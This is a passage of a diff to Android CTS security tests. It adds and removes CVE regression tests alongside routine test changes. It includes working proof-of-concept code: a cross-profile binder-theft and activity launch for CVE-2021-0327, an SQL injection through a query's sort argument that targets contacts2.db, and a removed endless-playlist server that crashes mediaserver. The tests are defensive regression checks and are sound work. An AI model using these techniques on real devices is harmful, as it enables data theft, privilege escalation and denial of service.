java.io.FileDescriptor; +import java.io.*; +import java.util.stream.Collectors; +import java.util.concurrent.TimeUnit; +import android.os.SystemClock; + +public class OtherUserActivity extends Activity { + + static ParcelFileDescriptor sTakenBinder; + private static final String TAG = "CVE_2021_0327"; + String errorMessage = null; + + @Override + protected void onCreate(Bundle savedInstanceState) { + super.onCreate(savedInstanceState); + doMakeProviderBad(null); + SystemClock.sleep(5000); + doStuff(null); + } + + public void doMakeProviderBad(View view) { + new MakeProviderBad().execute(); + } + + private class MakeProviderBad extends AsyncTask<Void, Void, Exception> { + + @Override + protected Exception doInBackground(Void... voids) { + try { + if (sTakenBinder != null) { + sTakenBinder.close(); + sTakenBinder = null; + } + + Uri uri = getIntent().getClipData().getItemAt(0).getUri(); + Bundle callResult = getContentResolver().call(uri, "get_aidl", null, null); + IBadProvider iface = IBadProvider.Stub.asInterface(callResult.getBinder("a")); + sTakenBinder = iface.takeBinder(); + if (sTakenBinder == null) { + throw new Exception("Failed to find binder of provider"); + } + iface.exit(); + } catch (Exception e) { + errorMessage = errorMessage==null ? e.toString() : errorMessage + ", " + e.toString(); + } + + return null; + } + + @Override + protected void onPostExecute(Exception e) { + } + } + + public void doStuff(View view) { + sendCommand("start", "--user", "0", "-d", "content://android.security.cts.CVE_2021_0327.BadProvider", "-n", "android.security.cts/.CVE_2021_0327.TestActivity"); + } + + @SuppressLint("PrivateApi") + void sendCommand(String... args) { + String[] command = new String[args.length + 2]; + command[0] = "/system/bin/cmd"; + command[1] = "activity"; + System.arraycopy(args, 0, command, 2, args.length); + + try{ + Runtime.getRuntime().exec(command); + } catch(Exception e){ + errorMessage = errorMessage==null ? e.toString() : errorMessage + ", " + e.toString(); + } + finally{ + synchronized(CVE_2021_0327.class){ + CVE_2021_0327.testActivityRequested=true; + CVE_2021_0327.errorMessage = errorMessage; + CVE_2021_0327.class.notifyAll(); + } + } + } +} diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0327/TestActivity.java b/tests/tests/security/src/android/security/cts/CVE_2021_0327/TestActivity.java new file mode 100644 index 00000000000..d44a220ec9d --- /dev/null +++ b/tests/tests/security/src/android/security/cts/CVE_2021_0327/TestActivity.java @@ -0,0 +1,17 @@ +package android.security.cts.CVE_2021_0327; + +import android.app.Activity; +import android.os.Bundle; +import android.util.Log; + +public class TestActivity extends Activity { + @Override + protected void onCreate(Bundle savedInstanceState) { + super.onCreate(savedInstanceState); + Log.d("CVE_2021_0327","TestActivity.onCreate()"); + synchronized(CVE_2021_0327.class){ + CVE_2021_0327.testActivityCreated=true; + CVE_2021_0327.class.notifyAll(); + } + } +} diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0327/workprofilesetup/AdminReceiver.java b/tests/tests/security/src/android/security/cts/CVE_2021_0327/workprofilesetup/AdminReceiver.java new file mode 100644 index 00000000000..d374dfd2edf --- /dev/null +++ b/tests/tests/security/src/android/security/cts/CVE_2021_0327/workprofilesetup/AdminReceiver.java @@ -0,0 +1,7 @@ +package android.security.cts.CVE_2021_0327.workprofilesetup; + +import android.app.admin.DeviceAdminReceiver; + +public class AdminReceiver extends DeviceAdminReceiver { + +} diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0327/workprofilesetup/ProvisionedActivity.java b/tests/tests/security/src/android/security/cts/CVE_2021_0327/workprofilesetup/ProvisionedActivity.java new file mode 100644 index 00000000000..1ae1c5dba4e --- /dev/null +++ b/tests/tests/security/src/android/security/cts/CVE_2021_0327/workprofilesetup/ProvisionedActivity.java @@ -0,0 +1,43 @@ +package android.security.cts.CVE_2021_0327.workprofilesetup; + +import android.app.Activity; +import android.app.admin.DevicePolicyManager; +import android.content.ComponentName; +import android.content.Intent; +import android.content.IntentFilter; +import android.content.pm.PackageManager; +import android.os.Bundle; + +import android.security.cts.CVE_2021_0327.OtherUserActivity; + +public class ProvisionedActivity extends Activity { + @Override + protected void onCreate(Bundle savedInstanceState) { + super.onCreate(savedInstanceState); + + getPackageManager().setComponentEnabledSetting( + new ComponentName( + this, + OtherUserActivity.class + ), + PackageManager.COMPONENT_ENABLED_STATE_ENABLED, + PackageManager.DONT_KILL_APP + ); + + DevicePolicyManager manager = getSystemService(DevicePolicyManager.class); + //IntentFilter intentFilter = new IntentFilter("com.example.clearedshell.OTHER_USER_ACTIVITY"); + IntentFilter intentFilter = new IntentFilter("android.security.cts.CVE_2021_0327.OTHER_USER_ACTIVITY"); + //IntentFilter intentFilter = new IntentFilter("android.security.cts.CVE_2021_0327$OTHER_USER_ACTIVITY"); + intentFilter.addCategory(Intent.CATEGORY_DEFAULT); + ComponentName admin = new ComponentName(this, AdminReceiver.class); + manager.addCrossProfileIntentFilter( + admin, + intentFilter, + DevicePolicyManager.FLAG_MANAGED_CAN_ACCESS_PARENT + ); + manager.setProfileEnabled(admin); + + setResult(RESULT_OK); + finish(); + } +} diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0339.java b/tests/tests/security/src/android/security/cts/CVE_2021_0339.java new file mode 100644 index 00000000000..a59d749772c --- /dev/null +++ b/tests/tests/security/src/android/security/cts/CVE_2021_0339.java @@ -0,0 +1,142 @@ +/* + * Copyright (C) 2020 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import static org.junit.Assert.assertThat; +import static org.junit.Assume.assumeThat; +import static org.hamcrest.Matchers.*; + +import android.app.Activity; +import android.content.Context; +import android.content.Intent; +import android.os.Bundle; +import android.os.RemoteCallback; +import android.os.SystemClock; +import android.platform.test.annotations.SecurityTest; +import android.test.AndroidTestCase; +import android.util.Log; +import androidx.test.InstrumentationRegistry; +import androidx.test.runner.AndroidJUnit4; +import org.junit.Test; +import org.junit.runner.RunWith; + +import java.util.concurrent.CompletableFuture; +import java.util.concurrent.TimeUnit; + +@SecurityTest +@RunWith(AndroidJUnit4.class) +public class CVE_2021_0339 { + + static final String TAG = CVE_2021_0339.class.getSimpleName(); + private static final String SECURITY_CTS_PACKAGE_NAME = "android.security.cts"; + private static final String CALLBACK_KEY = "testactivitycallback"; + private static final String RESULT_KEY = "testactivityresult"; + static final int DURATION_RESULT_CODE = 1; + static final int MAX_TRANSITION_DURATION_MS = 3000; // internal max + static final int TIME_MEASUREMENT_DELAY_MS = 5000; // tolerance for lag. + + private void launchActivity(Class<? extends Activity> clazz, RemoteCallback cb) { + final Context context = InstrumentationRegistry.getInstrumentation().getContext(); + final Intent intent = new Intent(Intent.ACTION_MAIN); + intent.setClassName(SECURITY_CTS_PACKAGE_NAME, clazz.getName()); + intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK); + intent.putExtra(CALLBACK_KEY, cb); + context.startActivity(intent); + } + + /** + * b/175817167 + * start the first activity and get the result from the remote callback + */ + @Test + @SecurityTest + public void testPocCVE_2021_0339() throws Exception { + CompletableFuture<Integer> callbackReturn = new CompletableFuture<>(); + RemoteCallback cb = new RemoteCallback((Bundle result) -> + callbackReturn.complete(result.getInt(RESULT_KEY))); + launchActivity(FirstActivity.class, cb); // start activity with callback as intent extra + + // blocking while the remotecallback is unset + int duration = callbackReturn.get(15, TimeUnit.SECONDS); + + // if we couldn't get the duration of secondactivity in firstactivity, the default is -1 + assumeThat(duration, not(equals(-1))); + + // the max duration after the fix is 3 seconds. + // we check to see that the total duration was less than 8 seconds after accounting for lag + assertThat(duration, + lessThan(MAX_TRANSITION_DURATION_MS + TIME_MEASUREMENT_DELAY_MS)); + } + + /** + * create an activity so that the second activity has something to animate from + * start the second activity and get the result + * return the result from the second activity in the remotecallback + */ + public static class FirstActivity extends Activity { + private RemoteCallback cb; + + @Override + public void onCreate(Bundle bundle) { + super.onCreate(bundle); + cb = (RemoteCallback) getIntent().getExtras().get(CALLBACK_KEY); + } + + @Override + public void onEnterAnimationComplete() { + super.onEnterAnimationComplete(); + Intent intent = new Intent(this, SecondActivity.class); + intent.putExtra("STARTED_TIMESTAMP", SystemClock.uptimeMillis()); + startActivityForResult(intent, DURATION_RESULT_CODE); + overridePendingTransition(R.anim.translate2,R.anim.translate1); + Log.d(TAG,this.getLocalClassName()+" onEnterAnimationComplete()"); + } + + @Override + protected void onActivityResult(int requestCode,int resultCode, Intent data) { + super.onActivityResult(requestCode, resultCode, data); + if (requestCode == DURATION_RESULT_CODE && resultCode == RESULT_OK) { + // this is the result that we requested + int duration = data.getIntExtra("duration", -1); // get result from secondactivity + Bundle res = new Bundle(); + res.putInt(RESULT_KEY, duration); + finish(); + cb.sendResult(res); // update callback in test + } + } + } + + /** + * measure time since secondactivity start to secondactivity animation complete + * return the duration in the result + */ + public static class SecondActivity extends Activity{ + @Override + public void onEnterAnimationComplete() { + super.onEnterAnimationComplete(); + long completedTs = SystemClock.uptimeMillis(); + long startedTs = getIntent().getLongExtra("STARTED_TIMESTAMP", 0); + int duration = (int)(completedTs - startedTs); + Log.d(TAG, this.getLocalClassName() + + " onEnterAnimationComplete() duration=" + Long.toString(duration)); + Intent durationIntent = new Intent(); + durationIntent.putExtra("duration", duration); + setResult(RESULT_OK, durationIntent); // set result for firstactivity + finish(); // firstactivity only gets the result when we finish + } + } +} diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0394.java b/tests/tests/security/src/android/security/cts/CVE_2021_0394.java new file mode 100644 index 00000000000..6d504f6a5b3 --- /dev/null +++ b/tests/tests/security/src/android/security/cts/CVE_2021_0394.java @@ -0,0 +1,45 @@ +/** + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import androidx.test.filters.RequiresDevice; +import androidx.test.runner.AndroidJUnit4; +import org.junit.runner.RunWith; +import org.junit.Test; +import static org.junit.Assert.assertFalse; + +@RunWith(AndroidJUnit4.class) +public class CVE_2021_0394 { + static { + System.loadLibrary("ctssecurity_jni"); + } + + /** + * b/172655291 + */ + @SecurityTest(minPatchLevel = "2021-03") + @Test + @RequiresDevice + // emulators always have checkJNI enabled which causes the test + // to abort the VM while passing invalid input to NewStringUTF + public void testPocCVE_2021_0394() throws Exception { + assertFalse(poc()); + } + + public static native boolean poc(); +} diff --git a/tests/tests/security/src/android/security/cts/CertificateData.java b/tests/tests/security/src/android/security/cts/CertificateData.java index 0b4780f9702..118b40fb0d9 100644 --- a/tests/tests/security/src/android/security/cts/CertificateData.java +++ b/tests/tests/security/src/android/security/cts/CertificateData.java @@ -17,14 +17,12 @@ */ package android.security.cts; -import android.platform.test.annotations.SecurityTest; /** * Run "./cts/tools/utils/java-cert-list-generator.sh > * cts/tests/tests/security/src/android/security/cts/CertificateData.java" * to generate this file. */ -@SecurityTest class CertificateData { static final String[] CERTIFICATE_DATA = { "91:C6:D6:EE:3E:8A:C8:63:84:E5:48:C2:99:29:5C:75:6C:81:7B:81", diff --git a/tests/tests/security/src/android/security/cts/CertificateTest.java b/tests/tests/security/src/android/security/cts/CertificateTest.java index 2d889889f98..7b1ed9dacb8 100644 --- a/tests/tests/security/src/android/security/cts/CertificateTest.java +++ b/tests/tests/security/src/android/security/cts/CertificateTest.java @@ -20,7 +20,6 @@ import java.io.File; import java.io.FileInputStream; import java.io.IOException; import android.content.pm.PackageManager; -import android.platform.test.annotations.SecurityTest; import android.test.AndroidTestCase; import java.security.KeyStore; import java.security.KeyStoreException; @@ -37,7 +36,6 @@ import java.util.HashSet; import java.util.List; import java.util.Set; -@SecurityTest public class CertificateTest extends AndroidTestCase { // The directory for CA root certificates trusted by WFA (WiFi Alliance) private static final String DIR_OF_CACERTS_FOR_WFA = diff --git a/tests/tests/security/src/android/security/cts/PackageSignatureTest.java b/tests/tests/security/src/android/security/cts/PackageSignatureTest.java index 3aec3942631..c5234d614f6 100644 --- a/tests/tests/security/src/android/security/cts/PackageSignatureTest.java +++ b/tests/tests/security/src/android/security/cts/PackageSignatureTest.java @@ -148,7 +148,10 @@ public class PackageSignatureTest extends AndroidTestCase { "com.android.apex.cts.shim", // Oom Catcher package to prevent tests from ooming device. - "com.android.cts.oomcatcher" + "com.android.cts.oomcatcher", + + // Collects device info at the start of the test + "com.android.compatibility.common.deviceinfo" )); diff --git a/tests/tests/security/src/android/security/cts/SQLiteTest.java b/tests/tests/security/src/android/security/cts/SQLiteTest.java new file mode 100644 index 00000000000..47407ca6222 --- /dev/null +++ b/tests/tests/security/src/android/security/cts/SQLiteTest.java @@ -0,0 +1,81 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.content.Context; +import android.content.ContentResolver; +import android.content.Intent; +import android.content.pm.PackageManager.NameNotFoundException; +import android.net.Uri; +import android.platform.test.annotations.SecurityTest; +import android.provider.VoicemailContract; +import android.test.AndroidTestCase; +import androidx.test.InstrumentationRegistry; +import static org.junit.Assert.*; + +@SecurityTest +public class SQLiteTest extends AndroidTestCase { + + private ContentResolver mResolver; + private String mPackageName; + private Context mContext; + + @Override + protected void setUp() throws Exception { + super.setUp(); + mResolver = getContext().getContentResolver(); + mContext = InstrumentationRegistry.getTargetContext(); + mPackageName = mContext.getPackageName(); + } + + /** + * b/139186193 + */ + @SecurityTest(minPatchLevel = "2019-11") + public void test_android_cve_2019_2195() { + Uri uri = VoicemailContract.Voicemails.CONTENT_URI; + uri = uri.buildUpon().appendQueryParameter("source_package", mPackageName).build(); + + try { + mContext.grantUriPermission(mPackageName, uri, + Intent.FLAG_GRANT_READ_URI_PERMISSION | Intent.FLAG_GRANT_WRITE_URI_PERMISSION + | Intent.FLAG_GRANT_PERSISTABLE_URI_PERMISSION); + } catch (Exception e) { + if (e instanceof java.lang.SecurityException) { + // this suggests com.android.providers.contacts.VoicemailContentProvider + // does not allow granting of Uri permissions, hence return. + return; + } + } + + try { + String fileToDump = mContext.createPackageContext("com.android.providers.contacts", 0) + .getDatabasePath("contacts2.db").getAbsolutePath(); + try { + mResolver.query(uri, null, null, null, + "_id ASC LIMIT _TOKENIZE('calls(_data,_data,_data,source_package,type) VALUES(''" + + fileToDump + "'',?,?,''" + mPackageName + "'',4);',0,'','Z')") + .close(); + fail("Vulnerable function exists"); + } catch (android.database.sqlite.SQLiteException e) { + // do nothing + } + } catch (NameNotFoundException n) { + // do nothing + } + } +} diff --git a/tests/tests/security/src/android/security/cts/StagefrightTest.java b/tests/tests/security/src/android/security/cts/StagefrightTest.java index 9a1a6df90ac..8b646a2d74e 100644 --- a/tests/tests/security/src/android/security/cts/StagefrightTest.java +++ b/tests/tests/security/src/android/security/cts/StagefrightTest.java @@ -1146,91 +1146,6 @@ public class StagefrightTest { @Test @SecurityTest(minPatchLevel = "2018-04") - public void testStagefright_cve_2017_13279() throws Exception { - Thread server = new Thread() { - @Override - public void run(){ - try (ServerSocket serverSocket = new ServerSocket(8080) { - {setSoTimeout(10_000);} // time out after 10 seconds - }; - Socket conn = serverSocket.accept() - ) { - OutputStream stream = conn.getOutputStream(); - byte http[] = ("HTTP/1.0 200 OK\r\nContent-Type: application/x-mpegURL\r\n\r\n" - + "#EXTM3U\n#EXT-X-STREAM-INF:\n").getBytes(); - stream.write(http); - while(!conn.isClosed()) - stream.write(("a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n" - + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n" - + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n" - + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n" - + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n" - + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n" - + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n" - + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n" - + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n" - + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n" - + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n" - + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n" - + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n" - + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n" - + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n" - + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n" - + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n" - + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n" - + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n" - + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n" - + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n" - + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n" - + "a\na\na\na\na\na\na\na\n").getBytes()); - } - catch(IOException e){ - } - } - }; - server.start(); - String uri = "http://127.0.0.1:8080/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" - + "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/" - + "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.m3u8"; - final MediaPlayerCrashListener mpcl = new MediaPlayerCrashListener(); - - LooperThread t = new LooperThread(new Runnable() { - @Override - public void run() { - - MediaPlayer mp = new MediaPlayer(); - mp.setOnErrorListener(mpcl); - mp.setOnPreparedListener(mpcl); - mp.setOnCompletionListener(mpcl); - RenderTarget renderTarget = RenderTarget.create(); - Surface surface = renderTarget.getSurface(); - mp.setSurface(surface); - AssetFileDescriptor fd = null; - try { - mp.setDataSource(uri); - mp.prepareAsync(); - } catch (IOException e) { - Log.e(TAG, e.toString()); - } finally { - closeQuietly(fd); - } - - Looper.loop(); - mp.release(); - } - }); - t.start(); - Thread.sleep(60000); // Poc takes a while to crash mediaserver, waitForError - // doesn't wait long enough - assertFalse("Device *IS* vulnerable to CVE-2017-13279", - mpcl.waitForError() == MediaPlayer.MEDIA_ERROR_SERVER_DIED); - t.stopLooper(); - t.join(); // wait for thread to exit so we're sure the player was released - server.join(); - } - - @Test - @SecurityTest(minPatchLevel = "2018-04") public void testStagefright_cve_2017_13276() throws Exception { doStagefrightTest(R.raw.cve_2017_13276); } @@ -1259,6 +1174,95 @@ public class StagefrightTest { ***********************************************************/ @Test + @SecurityTest(minPatchLevel = "2019-07") + public void testStagefright_cve_2019_2107() throws Exception { + assumeFalse(ModuleDetector.moduleIsPlayManaged( + getInstrumentation().getContext().getPackageManager(), + MainlineModule.MEDIA_SOFTWARE_CODEC)); + int[] frameSizes = getFrameSizes(R.raw.cve_2019_2107_framelen); + doStagefrightTestRawBlob(R.raw.cve_2019_2107_hevc, "video/hevc", 1920, + 1080, frameSizes); + } + + @Test + @SecurityTest(minPatchLevel = "2019-04") + public void testStagefright_cve_2019_2245() throws Exception { + doStagefrightTest(R.raw.cve_2019_2245); + } + + @Test + @SecurityTest(minPatchLevel = "2019-04") + public void testStagefright_cve_2018_13925() throws Exception { + doStagefrightTest(R.raw.cve_2018_13925); + } + + @Test + @SecurityTest(minPatchLevel = "2020-12") + public void testStagefright_cve_2020_11139() throws Exception { + doStagefrightTest(R.raw.cve_2020_11139); + } + + @Test + @SecurityTest(minPatchLevel = "2020-06") + public void testStagefright_cve_2020_3663() throws Exception { + doStagefrightTest(R.raw.cve_2020_3663); + } + + @Test + @SecurityTest(minPatchLevel = "2020-08") + public void testStagefright_cve_2020_11122() throws Exception { + doStagefrightTest(R.raw.cve_2020_11122); + } + + @Test + @SecurityTest(minPatchLevel = "2020-07") + public void testStagefright_cve_2020_3688() throws Exception { + doStagefrightTest(R.raw.cve_2020_3688); + } + + @Test + @SecurityTest(minPatchLevel = "2020-11") + public void testStagefright_cve_2020_11168() throws Exception { + doStagefrightTest(R.raw.cve_2020_11168); + } + + @Test + @SecurityTest(minPatchLevel = "2020-06") + public void testStagefright_cve_2020_3658() throws Exception { + doStagefrightTest(R.raw.cve_2020_3658); + } + + @Test + @SecurityTest(minPatchLevel = "2020-05") + public void testStagefright_cve_2020_3633() throws Exception { + doStagefrightTest(R.raw.cve_2020_3633); + } + + @Test + @SecurityTest(minPatchLevel = "2020-06") + public void testStagefright_cve_2020_3660() throws Exception { + doStagefrightTest(R.raw.cve_2020_3660); + } + + @Test + @SecurityTest(minPatchLevel = "2020-06") + public void testStagefright_cve_2020_3661() throws Exception { + doStagefrightTest(R.raw.cve_2020_3661); + } + + @Test + @SecurityTest(minPatchLevel = "2020-01") + public void testStagefright_cve_2019_14013() throws Exception { + doStagefrightTest(R.raw.cve_2019_14013); + } + + @Test + @SecurityTest(minPatchLevel = "2020-06") + public void testStagefright_cve_2020_3662() throws Exception { + doStagefrightTest(R.raw.cve_2020_3662); + } + + @Test @SecurityTest(minPatchLevel = "2021-01") public void testStagefright_cve_2021_0312() throws Exception { assumeFalse(ModuleDetector.moduleIsPlayManaged( @@ -1868,7 +1872,9 @@ public class StagefrightTest { Thread.sleep(CHECK_INTERVAL); timeout -= CHECK_INTERVAL; } + if (!reportFile.exists() || !reportFile.isFile() || !lockFile.exists()) { + Log.e(TAG, "couldn't get the report or lock file"); return null; } try (BufferedReader reader = new BufferedReader(new FileReader(reportFile))) { @@ -1933,7 +1939,9 @@ public class StagefrightTest { if (what != MediaPlayer.MEDIA_ERROR_SERVER_DIED) { what = newWhat; } + lock.lock(); + errored = true; condition.signal(); lock.unlock(); @@ -1956,17 +1964,19 @@ public class StagefrightTest { public int waitForError() throws InterruptedException { lock.lock(); - if (condition.awaitNanos(TIMEOUT_NS) <= 0) { - Log.d(TAG, "timed out on waiting for error"); + if (!errored && !completed) { + if (condition.awaitNanos(TIMEOUT_NS) <= 0) { + Log.d(TAG, "timed out on waiting for error. " + + "errored: " + errored + ", completed: " + completed); + } } lock.unlock(); - if (what != 0) { + if (what == MediaPlayer.MEDIA_ERROR_SERVER_DIED) { // Sometimes mediaserver signals a decoding error first, and *then* crashes // due to additional in-flight buffers being processed, so wait a little // and see if more errors show up. + Log.e(TAG, "couldn't get media crash yet, waiting 1 second"); SystemClock.sleep(1000); - } - if (what == MediaPlayer.MEDIA_ERROR_SERVER_DIED) { JSONArray crashes = getCrashReport(name.getMethodName(), 5000); if (crashes == null) { Log.e(TAG, "Crash results not found for test " + name.getMethodName()); @@ -1979,8 +1989,8 @@ public class StagefrightTest { // 0 is the code for no error. return 0; } - } + Log.d(TAG, "waitForError finished with no errors."); return what; } @@ -1997,6 +2007,7 @@ public class StagefrightTest { Condition condition = lock.newCondition(); int what; boolean completed = false; + boolean errored = false; } class LooperThread extends Thread { diff --git a/tests/tests/syncmanager/AndroidTest.xml b/tests/tests/syncmanager/AndroidTest.xml index 4c53d793df6..72e13aee2c5 100644 --- a/tests/tests/syncmanager/AndroidTest.xml +++ b/tests/tests/syncmanager/AndroidTest.xml @@ -48,6 +48,8 @@ </target_preparer> <test class="com.android.tradefed.testtype.AndroidJUnitTest" > <option name="package" value="android.content.syncmanager.cts" /> - <option name="runtime-hint" value="10m00s" /> + <!-- max timeout of 10 min for each test --> + <option name="test-timeout" value="600000" /> + <option name="runtime-hint" value="20m00s" /> </test> </configuration> diff --git a/tests/tests/telephony/current/src/android/telephony/cts/SubscriptionManagerTest.java b/tests/tests/telephony/current/src/android/telephony/cts/SubscriptionManagerTest.java index 01401f83857..86371fdc559 100644 --- a/tests/tests/telephony/current/src/android/telephony/cts/SubscriptionManagerTest.java +++ b/tests/tests/telephony/current/src/android/telephony/cts/SubscriptionManagerTest.java @@ -18,6 +18,7 @@ package android.telephony.cts; import static android.net.NetworkCapabilities.NET_CAPABILITY_INTERNET; import static android.net.NetworkCapabilities.NET_CAPABILITY_NOT_CONGESTED; +import static android.net.NetworkCapabilities.NET_CAPABILITY_NOT_METERED; import static android.net.NetworkCapabilities.NET_CAPABILITY_NOT_RESTRICTED; import static android.net.NetworkCapabilities.NET_CAPABILITY_TEMPORARILY_NOT_METERED; import static android.net.NetworkCapabilities.TRANSPORT_CELLULAR; @@ -124,6 +125,7 @@ public class SubscriptionManagerTest { @AfterClass public static void tearDownClass() throws Exception { if (!isSupported()) return; + TelephonyUtils.flushTelephonyMetrics(InstrumentationRegistry.getInstrumentation()); } @Before @@ -347,13 +349,12 @@ public class SubscriptionManagerTest { mSm.setSubscriptionPlans(mSubId, Arrays.asList(buildValidSubscriptionPlan())); // Cellular is metered by default - assertFalse(cm.getNetworkCapabilities(net).hasCapability( - NET_CAPABILITY_TEMPORARILY_NOT_METERED)); + assertFalse(cm.getNetworkCapabilities(net).hasCapability(NET_CAPABILITY_NOT_METERED)); // Override should make it go temporarily unmetered { final CountDownLatch latch = waitForNetworkCapabilities(net, caps -> { - return caps.hasCapability(NET_CAPABILITY_TEMPORARILY_NOT_METERED); + return caps.hasCapability(NET_CAPABILITY_NOT_METERED); }); mSm.setSubscriptionOverrideUnmetered(mSubId, true, 0); assertTrue(latch.await(10, TimeUnit.SECONDS)); @@ -362,7 +363,7 @@ public class SubscriptionManagerTest { // Clearing override should make it go metered { final CountDownLatch latch = waitForNetworkCapabilities(net, caps -> { - return !caps.hasCapability(NET_CAPABILITY_TEMPORARILY_NOT_METERED); + return !caps.hasCapability(NET_CAPABILITY_NOT_METERED); }); mSm.setSubscriptionOverrideUnmetered(mSubId, false, 0); assertTrue(latch.await(10, TimeUnit.SECONDS)); diff --git a/tests/tests/telephony/current/src/android/telephony/cts/TelephonyUtils.java b/tests/tests/telephony/current/src/android/telephony/cts/TelephonyUtils.java index f389098e9e4..b3515cd4dfb 100644 --- a/tests/tests/telephony/current/src/android/telephony/cts/TelephonyUtils.java +++ b/tests/tests/telephony/current/src/android/telephony/cts/TelephonyUtils.java @@ -35,6 +35,9 @@ public class TelephonyUtils { private static final String COMMAND_END_BLOCK_SUPPRESSION = "cmd phone end-block-suppression"; + private static final String COMMAND_FLUSH_TELEPHONY_METRICS = + "/system/bin/dumpsys activity service TelephonyDebugService --metricsproto"; + public static void addTestEmergencyNumber(Instrumentation instr, String testNumber) throws Exception { executeShellCommand(instr, COMMAND_ADD_TEST_EMERGENCY_NUMBER + testNumber); @@ -49,6 +52,10 @@ public class TelephonyUtils { executeShellCommand(instr, COMMAND_END_BLOCK_SUPPRESSION); } + public static void flushTelephonyMetrics(Instrumentation instr) throws Exception { + executeShellCommand(instr, COMMAND_FLUSH_TELEPHONY_METRICS); + } + public static boolean isSkt(TelephonyManager telephonyManager) { return isOperator(telephonyManager, "45005"); } diff --git a/tests/tests/text/AndroidTest.xml b/tests/tests/text/AndroidTest.xml index 2af80599dc1..8c8c30d673c 100644 --- a/tests/tests/text/AndroidTest.xml +++ b/tests/tests/text/AndroidTest.xml @@ -21,6 +21,10 @@ <option name="config-descriptor:metadata" key="parameter" value="secondary_user" /> <target_preparer class="com.android.tradefed.targetprep.suite.SuiteApkInstaller"> <option name="cleanup-apks" value="true" /> + <option name="test-file-name" value="CtsTextTestResourceData.apk" /> + </target_preparer> + <target_preparer class="com.android.tradefed.targetprep.suite.SuiteApkInstaller"> + <option name="cleanup-apks" value="true" /> <option name="test-file-name" value="CtsTextTestCases.apk" /> </target_preparer> <test class="com.android.tradefed.testtype.AndroidJUnitTest" > diff --git a/tests/tests/text/resourceApk/Android.bp b/tests/tests/text/resourceApk/Android.bp new file mode 100644 index 00000000000..3f4d4c9d0fc --- /dev/null +++ b/tests/tests/text/resourceApk/Android.bp @@ -0,0 +1,33 @@ +// Copyright (C) 2021 The Android Open Source Project +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. + +package { + default_applicable_licenses: ["Android-Apache-2.0"], +} + +android_test { + name: "CtsTextTestResourceData", + defaults: ["cts_defaults"], + + srcs: [ + "src/**/*.java", + "src/**/*.kt", + ], + + test_suites: [ + "cts", + "general-tests", + "mts", + ], +} diff --git 